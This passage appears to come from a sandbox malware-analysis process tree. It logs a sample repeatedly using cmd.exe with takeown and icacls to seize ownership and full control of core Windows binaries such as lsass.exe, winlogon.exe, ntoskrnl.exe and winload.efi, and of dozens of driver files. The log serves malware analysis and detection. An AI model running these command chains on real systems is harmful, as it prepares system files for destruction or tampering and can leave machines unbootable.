PID:2300
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\svchost.exe /grant "Admin:F"3⤵PID:2684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\smss.exe && icacls C:\Windows\SysWOW64\smss.exe /grant "%username%:F" && exit2⤵PID:4764
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\smss.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\csrss.exe && icacls C:\Windows\SysWOW64\csrss.exe /grant "%username%:F" && exit2⤵PID:3476
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\csrss.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\wininit.exe && icacls C:\Windows\SysWOW64\wininit.exe /grant "%username%:F" && exit2⤵PID:2360
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\wininit.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\LogonUI.exe && icacls C:\Windows\SysWOW64\LogonUI.exe /grant "%username%:F" && exit2⤵PID:1452
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\LogonUI.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\lsass.exe && icacls C:\Windows\SysWOW64\lsass.exe /grant "%username%:F" && exit2⤵PID:4280
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\lsass.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\services.exe && icacls C:\Windows\SysWOW64\services.exe /grant "%username%:F" && exit2⤵PID:3108
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\services.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winlogon.exe && icacls C:\Windows\SysWOW64\winlogon.exe /grant "%username%:F" && exit2⤵PID:844
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winlogon.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.efi && icacls C:\Windows\SysWOW64\winload.efi /grant "%username%:F" && exit2⤵PID:4384
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winload.efi3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.exe && icacls C:\Windows\SysWOW64\winload.exe /grant "%username%:F" && exit2⤵PID:4244
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winload.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\ntoskrnl.exe && icacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "%username%:F" && exit2⤵PID:3848
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\ntoskrnl.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\svchost.exe && icacls C:\Windows\SysWOW64\svchost.exe /grant "%username%:F" && exit2⤵PID:412
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\svchost.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3304
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\svchost.exe /grant "Admin:F"3⤵PID:5208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394ohci.sys && icacls C:\Windows\System32\drivers\1394ohci.sys /grant "%username%:F" && exit2⤵PID:2260
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\1394ohci.sys3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:4736
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\1394ohci.sys /grant "Admin:F"3⤵PID:1984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\3ware.sys && icacls C:\Windows\System32\drivers\3ware.sys /grant "%username%:F" && exit2⤵PID:4216
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5064
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\3ware.sys3⤵PID:5132
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\3ware.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:5532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpi.sys && icacls C:\Windows\System32\drivers\acpi.sys /grant "%username%:F" && exit2⤵PID:2684
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\acpi.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3552
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\acpi.sys /grant "Admin:F"3⤵PID:5352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AcpiDev.sys && icacls C:\Windows\System32\drivers\AcpiDev.sys /grant "%username%:F" && exit2⤵PID:4236
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\AcpiDev.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5188
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\AcpiDev.sys /grant "Admin:F"3⤵PID:5696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpiex.sys && icacls C:\Windows\System32\drivers\acpiex.sys /grant "%username%:F" && exit2⤵PID:724
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\acpiex.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5640
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\acpiex.sys /grant "Admin:F"3⤵PID:6132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpipagr.sys && icacls C:\Windows\System32\drivers\acpipagr.sys /grant "%username%:F" && exit2⤵PID:2128
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\acpipagr.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5424
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\acpipagr.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:5756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpipmi.sys && icacls C:\Windows\System32\drivers\acpipmi.sys /grant "%username%:F" && exit2⤵PID:228
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\acpipmi.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5444
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\acpipmi.sys /grant "Admin:F"3⤵PID:5732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpitime.sys && icacls C:\Windows\System32\drivers\acpitime.sys /grant "%username%:F" && exit2⤵PID:3252
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\acpitime.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5508
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\acpitime.sys /grant "Admin:F"3⤵PID:5980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Acx01000.sys && icacls C:\Windows\System32\drivers\Acx01000.sys /grant "%username%:F" && exit2⤵PID:5140
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Acx01000.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5652
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Acx01000.sys /grant "Admin:F"3⤵PID:5256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adp80xx.sys && icacls C:\Windows\System32\drivers\adp80xx.sys /grant "%username%:F" && exit2⤵PID:5228
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\adp80xx.sys3⤵PID:5612
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\adp80xx.sys /grant "Admin:F"3⤵PID:5676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\afd.sys && icacls C:\Windows\System32\drivers\afd.sys /grant "%username%:F" && exit2⤵PID:5308
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\afd.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6068
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\afd.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:5604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\afunix.sys && icacls C:\Windows\System32\drivers\afunix.sys /grant "%username%:F" && exit2⤵PID:5360
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\afunix.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5876
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\afunix.sys /grant "Admin:F"3⤵PID:5476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\agilevpn.sys && icacls C:\Windows\System32\drivers\agilevpn.sys /grant "%username%:F" && exit2⤵PID:5412
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\agilevpn.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5960
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\agilevpn.sys /grant "Admin:F"3⤵PID:4808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ahcache.sys && icacls C:\Windows\System32\drivers\ahcache.sys /grant "%username%:F" && exit2⤵PID:5492
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ahcache.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:6012
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ahcache.sys /grant "Admin:F"3⤵PID:5764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdgpio2.sys && icacls C:\Windows\System32\drivers\amdgpio2.sys /grant "%username%:F" && exit2⤵PID:5568
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdgpio2.sys3⤵PID:6116
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdgpio2.sys /grant "Admin:F"3⤵PID:3048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdi2c.sys && icacls C:\Windows\System32\drivers\amdi2c.sys /grant "%username%:F" && exit2⤵PID:5632
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdi2c.sys3⤵PID:2664
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdi2c.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:5348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdk8.sys && icacls C:\Windows\System32\drivers\amdk8.sys /grant "%username%:F" && exit2⤵PID:5720
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdk8.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5252
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdk8.sys /grant "Admin:F"3⤵PID:5276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdppm.sys && icacls C:\Windows\System32\drivers\amdppm.sys /grant "%username%:F" && exit2⤵PID:5780
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdppm.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5408
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdppm.sys /grant "Admin:F"3⤵PID:5872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsata.sys && icacls C:\Windows\System32\drivers\amdsata.sys /grant "%username%:F" && exit2⤵PID:5860
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdsata.sys3⤵PID:3740
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdsata.sys /grant "Admin:F"3⤵PID:6136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsbs.sys && icacls C:\Windows\System32\drivers\amdsbs.sys /grant "%username%:F" && exit2⤵PID:5904
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdsbs.sys3⤵PID:5444
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdsbs.sys /grant "Admin:F"3⤵PID:5232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdxata.sys && icacls C:\Windows\System32\drivers\amdxata.sys /grant "%username%:F" && exit2⤵PID:5992
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdxata.sys3⤵PID:5808
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdxata.sys /grant "Admin:F"3⤵PID:5832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\appid.sys && icacls C:\Windows\System32\drivers\appid.sys /grant "%username%:F" && exit2⤵PID:6100
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\appid.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5536
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\appid.sys /grant "Admin:F"3⤵PID:5196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AppleSSD.sys && icacls C:\Windows\System32\drivers\AppleSSD.sys /grant "%username%:F" && exit2⤵PID:2364
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\AppleSSD.sys3⤵PID:2444
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\AppleSSD.sys /grant "Admin:F"3⤵PID:5264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\applockerfltr.sys && icacls C:\Windows\System32\drivers\applockerfltr.sys /grant "%username%:F" && exit2⤵PID:5208
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\applockerfltr.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1064
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\applockerfltr.sys /grant "Admin:F"3⤵PID:5808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AppVStrm.sys && icacls C:\Windows\System32\drivers\AppVStrm.sys /grant "%username%:F" && exit2⤵PID:5516
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\AppVStrm.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5252
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\AppVStrm.sys /grant "Admin:F"3⤵PID:5684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AppvVemgr.sys && icacls C:\Windows\System32\drivers\AppvVemgr.sys /grant "%username%:F" && exit2⤵PID:3416
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\AppvVemgr.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5508
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\AppvVemgr.sys /grant "Admin:F"3⤵PID:5752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AppvVfs.sys && icacls C:\Windows\System32\drivers\AppvVfs.sys /grant "%username%:F" && exit2⤵PID:5680
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5612
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\AppvVfs.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5804
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\AppvVfs.sys /grant "Admin:F"3⤵PID:5884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arcsas.sys && icacls C:\Windows\System32\drivers\arcsas.sys /grant "%username%:F" && exit2⤵PID:2828
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\arcsas.sys3⤵PID:5580
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\arcsas.sys /grant "Admin:F"3⤵PID:5872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\asyncmac.sys && icacls C:\Windows\System32\drivers\asyncmac.sys /grant "%username%:F" && exit2⤵PID:5880
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\asyncmac.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5744
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\asyncmac.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:5864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\atapi.sys && icacls C:\Windows\System32\drivers\atapi.sys /grant "%username%:F" && exit2⤵PID:6076
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\atapi.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5716
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\atapi.sys /grant "Admin:F"3⤵PID:5848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ataport.sys && icacls C:\Windows\System32\drivers\ataport.sys /grant "%username%:F" && exit2⤵PID:3596
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ataport.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5160
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ataport.sys /grant "Admin:F"3⤵PID:884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bam.sys && icacls C:\Windows\System32\drivers\bam.sys /grant "%username%:F" && exit2⤵PID:2284
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bam.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bam.sys /grant "Admin:F"3⤵PID:5184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\battc.sys && icacls C:\Windows\System32\drivers\battc.sys /grant "%username%:F" && exit2⤵PID:6120
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\battc.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6068
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\battc.sys /grant "Admin:F"3⤵PID:1984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bcmfn2.sys && icacls C:\Windows\System32\drivers\bcmfn2.sys /grant "%username%:F" && exit2⤵PID:5668
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bcmfn2.sys3⤵
- Modifies file permissions
PID:5608
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bcmfn2.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:5872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\beep.sys && icacls C:\Windows\System32\drivers\beep.sys /grant "%username%:F" && exit2⤵PID:5712
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\beep.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5572
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\beep.sys /grant "Admin:F"3⤵PID:5660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bindflt.sys && icacls C:\Windows\System32\drivers\bindflt.sys /grant "%username%:F" && exit2⤵PID:5556
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bindflt.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5908
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bindflt.sys /grant "Admin:F"3⤵PID:5196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bowser.sys && icacls C:\Windows\System32\drivers\bowser.sys /grant "%username%:F" && exit2⤵PID:5328
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bowser.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5988
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bowser.sys /grant "Admin:F"3⤵PID:5044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bridge.sys && icacls C:\Windows\System32\drivers\bridge.sys /grant "%username%:F" && exit2⤵PID:2452
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bridge.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5936
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bridge.sys /grant "Admin:F"3⤵PID:3060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BtaMPM.sys && icacls C:\Windows\System32\drivers\BtaMPM.sys /grant "%username%:F" && exit2⤵PID:5544
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BtaMPM.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5520
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BtaMPM.sys /grant "Admin:F"3⤵PID:5268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BthA2dp.sys && icacls C:\Windows\System32\drivers\BthA2dp.sys /grant "%username%:F" && exit2⤵PID:5444
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BthA2dp.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6072
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BthA2dp.sys /grant "Admin:F"3⤵PID:3700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bthenum.sys && icacls C:\Windows\System32\drivers\bthenum.sys /grant "%username%:F" && exit2⤵PID:2444
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bthenum.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5264
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bthenum.sys /grant "Admin:F"3⤵PID:5440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BthHfEnum.sys && icacls C:\Windows\System32\drivers\BthHfEnum.sys /grant "%username%:F" && exit2⤵PID:5504
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BthHfEnum.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5708
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BthHfEnum.sys /grant "Admin:F"3⤵PID:5616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BthMini.SYS && icacls C:\Windows\System32\drivers\BthMini.SYS /grant "%username%:F" && exit2⤵PID:5808
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BthMini.SYS3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5776
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BthMini.SYS /grant "Admin:F"3⤵PID:5316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bthmodem.sys && icacls C:\Windows\System32\drivers\bthmodem.sys /grant "%username%:F" && exit2⤵PID:3048
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bthmodem.sys3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:5936
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bthmodem.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:6068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bthport.sys && icacls C:\Windows\System32\drivers\bthport.sys /grant "%username%:F" && exit2⤵PID:5276
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bthport.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bthport.sys /grant "Admin:F"3⤵PID:3884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BTHUSB.SYS && icacls C:\Windows\System32\drivers\BTHUSB.SYS /grant "%username%:F" && exit2⤵PID:5908
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5608
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BTHUSB.SYS3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5264
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BTHUSB.SYS /grant "Admin:F"3⤵PID:5944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bttflt.sys && icacls C:\Windows\System32\drivers\bttflt.sys /grant "%username%:F" && exit2⤵PID:1292
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bttflt.sys3⤵
- Modifies file permissions
PID:5976
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bttflt.sys /grant "Admin:F"3⤵PID:5408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\buttonconverter.sys && icacls C:\Windows\System32\drivers\buttonconverter.sys /grant "%username%:F" && exit2⤵PID:5964
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\buttonconverter.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4952
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\buttonconverter.sys /grant "Admin:F"3⤵PID:4388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bxvbda.sys && icacls C:\Windows\System32\drivers\bxvbda.sys /grant "%username%:F" && exit2⤵PID:5512
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bxvbda.sys3⤵PID:5452
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bxvbda.sys /grant "Admin:F"3⤵PID:5888
-
-
-
